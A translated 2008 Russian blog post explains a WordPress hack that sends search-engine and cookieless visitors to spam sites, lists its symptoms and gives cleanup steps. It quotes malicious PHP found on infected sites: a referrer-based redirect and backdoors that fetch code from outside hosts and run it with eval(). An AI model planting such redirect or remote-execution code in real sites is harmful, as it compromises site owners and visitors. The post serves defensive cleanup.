12.12.2008 12:03Взлом WordPress: перенаправление поискового трафика и трафика без Cookie на спам сайты

Перевод статьи WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites

Я уже писал о Взломе Wordpress с использованием клоакинга по IP-адресам Google и о том как почистить Wordpress-блог после такого взлома.

На этот раз речь пойдет о еще одном виде взлома WordPress использующем дыры в системе безопасности и уязвимости блога для внедрения вредоносного php кода в коды WordPress.

Хакеры прилагают все возможные усилия, чтобы взломать и использовать в своих целях блоги WordPress по всей сети, размещая и внедряя вредоносный код в коды и базу данных WordPress, чтобы перенаправить посетителей и хиты из Google и других поисковиков на такие спам-сайты, как your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us и многие другие спам-сайты, наполненные рекламой с оплатой за клик. Некоторые взломы нацелены на получение большого трафика за счет редиректа еще до обращения к WordPress. Если бы не взлом, то весь трафик попадал бы на блог.

Признаки перенаправления трафика из поисковых систем

Учтите, что не все признаки встречаются одновременно. Существует несколько видов взлома, и, соответственно, разные способы его выявления и устранения.

• Любой клик в выдаче Google, Yahoo, AOL, MSN, Windows Live, включая название блога, будет перенаправлен на сайт хакера, например: your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, и этот список постоянно растет. Посетитель попадает на страницу хакера, которая содержит те же слова, которые посетитель использовал в своем поисковом запросе.
• При переходе по ссылке на блог из RSS ридера (например, Google reader), пользователь также может быть перенаправлен на сайт хакера.
• Посетитель, который не зарегистрирован в блоге или не вошел в свою учетную запись (а значит вредоносный код не может найти для него запись COOKIE (см. примеры ниже)), будет перенаправлен на спам-сайты.
• Посетители перенаправляются только из поисковика, и хакерам удается дурачить многих блоггеров, веб-мастеров и владельцев сайтов с помощью этого трюка или, по крайней мере, это вид взлома выявляют не сразу.
• Внезапное снижение и значительная потеря трафика посетителей и просмотров страницы, особенно трафика из Google, даже если ранжирование выдачи поисковика осталось нетронутым.
• Значительное снижение доходов от рекламы Google AdSense или другой рекламной сети, или снижение партнерских комиссионных.
• В файле wp-blog-header.php можно обнаружить следующий PHP код с использованием шифрования base64:
  <?php \
  $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn", "weather", "alexa");
  $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
  if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

• Изображение, которое, в сущности, является набором вредоносных PHP кодов, было добавлено в папку wp-contents/uploads например: wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg. Это изображение также может находиться в папке темы, например: wp-contents/themes/classic/images/xyz.jpg. Имя изображения может иметь следующий формат: xxxxxx_old.jpeg.
• В базу данных MySQL была вставлена запись для WordPress wp_options, чтобы активировать изображение (вредоносный PHP код) как плагин, обычно это rss_f541b3abd05e7962fcab37737f40fad8.
• Возможно присутствуют вредоносные коды, которые выполняются командой eval() или команда base64_decode() внедрена в другие PHP-файлы WordPress. Вот примеры таких кодов:
  if(isset($_GET['p'])) {
  $sock = @fsockopen(’km20725.keymachine.de’, 80);
  if($sock){
  fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
  fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
  while($content[] = fgets ($sock));
  $content = implode(”, $content);
  @eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
  fclose ($sock);}
  }if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
  } if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
  }

  eval(gzinflate(base64_decode(

• Тема WordPress, которую вы установили и используете, тоже может содержать хакерский код. Такой код обычно находится в файле header.php или index.php темы и содержит строку типа:
  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

Перенаправление поискового трафика WordPress на спам-сайты, возможно, происходит из-за дыры в системе безопасности и уязвимости блога, если не установлена заплатка, т.к. блоггер решил не обновляться до последней версии WordPress (хотя есть сведения и о взломе блогов, на которых установлена последняя версия WordPress). Какой бы ни была причина, есть способы очистки блога после взлома, чтобы вернуть себе трафик и избежать наказания от Google за редирект на спам-страницы.

1. Создайте резервную копию базы данных WordPress.

2. Используйте phpMyAdmin, чтобы просмотреть таблицы базы данных MySQL WordPress. Перейдите к таблице wp_options и отредактируйте строку active_plugins. В этой строке указаны все активированные плагины. Поищите среди них плагин, название которого заканчивается расширением изображения (.jpg, .jpeg, .gif и т.д.), например: abcdefgh_old.jpeg. Запомните путь к файлу изображения.

3. Затем найдите и удалите файл, используя sFTP или SSH (забудьте об FTP или Telnet в целях безопасности).

4. Зайдите в панель «Управление плагинами» WordPress, деактивируйте или активируйте любой плагин, чтобы удалить вредоносный плагин из строки «active_plugins».

5. Вернитесь в phpMyAdmin и в таблице wp_options найдите строку, содержащую следующую последовательность в option_name:

rss_f541b3abd05e7962fcab37737f40fad8

Удалите эту строку.

6. Перейдите к таблице wp_users. Если в ней присутствует пользователь без имени (нулевое значение в поле user_nicename), созданный 0000-00-00 в 00:00:00, запишите идентификатор пользователя (поле ID, номер). Удалите этого пользователя.

7. Просмотрите таблицу wp_usermeta. Найдите все строки, в которых user_id совпадает с идентификатором несанкционированного пользователя, которого вы удалили. Обычно есть три строки, ассоциированные с идентификатором взломщика. Удалите все эти строки.

8. Войдите на сервер, чтобы отредактировать файлы темы, или просмотрите код файлов темы в «Редакторе тем» в панели «Дизайн» WordPress. Проверьте, нет ли какого-либо подозрительного кода в header.php и index.php. Как уже было указано выше, ищите что-то типа:

if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

Если обнаружили подозрительный код, удалите его. Учтите, что вредоносный код обычно содержит несколько строк.

9. Если у вас еще нет файла index.html, создайте его в папке wp-contents/plugins. Пустой файл index.html скрывает от хакеров содержимое папки plugins, а также то, какие плагины вами используются, что повышает безопасность WordPress.

10. Загрузите и замените все до единого файлы WordPress (а не только wp-blog-header.php) на сервер с чистой новейшей версией WordPress (конечно же, за исключением нескольких файлов: wp-config.php и темы). Если вы обновляетесь, внимательно прочтите руководство.

11. Смените пароль.

12. Если у вас много пользователей, измените их пароли тоже (или попросите их сменить свои пароли).

• Взлом Wordpress с использованием клоакинга по IP-адресам Google
• 10 полезных RSS-приемов для WordPress
• Полезные SQL приемы для WordPress
• Три рецепта для WordPress
• 10 ошибок, которые могут погубить ваш блог (Часть 2)